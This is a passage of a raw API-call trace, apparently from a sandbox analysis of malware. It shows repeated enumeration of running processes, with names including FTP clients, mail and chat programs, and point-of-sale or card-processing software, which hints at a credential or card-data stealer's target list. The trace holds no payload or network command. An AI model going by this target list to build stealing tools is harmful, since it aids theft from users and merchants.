th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0158.782] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0158.788] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0158.790] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0158.794] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0158.797] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0158.799] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0158.801] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0158.804] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0158.806] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0158.808] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0158.810] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0158.812] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0158.814] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0158.816] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0158.818] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0158.820] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0158.822] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0158.823] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0158.828] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0158.829] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0158.831] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0158.833] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0158.835] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0158.837] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0158.838] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0158.840] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0158.842] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0158.844] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0158.846] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0158.849] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0158.851] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0158.853] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0158.854] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0158.856] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0158.858] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0158.860] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0158.862] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0159.011] CloseHandle (hObject=0x1b78) returned 1 [0159.011] Sleep (dwMilliseconds=0x64) [0159.147] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b4c [0159.163] Process32First (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.165] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0159.167] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0159.170] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0159.172] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0159.175] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0159.177] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0159.179] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0159.182] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0159.240] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.242] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.245] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0159.247] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.255] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.258] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.260] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.263] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.266] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.269] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.272] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0159.275] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0159.277] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0159.338] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0159.341] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.343] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0159.345] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0159.348] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0159.354] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0159.357] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0159.359] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0159.361] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.364] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0159.366] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0159.368] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0159.371] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0159.373] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.375] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0159.415] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0159.418] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0159.420] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0159.422] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0159.425] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0159.428] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0159.430] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0159.432] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0159.435] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0159.437] Process32Next (in: 